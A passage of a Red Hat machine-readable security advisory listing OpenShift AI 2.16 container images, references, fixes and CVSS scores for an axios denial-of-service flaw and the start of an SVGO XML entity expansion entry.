"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-29074",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445132"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "svgo: SVGO: Denial of Service via XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
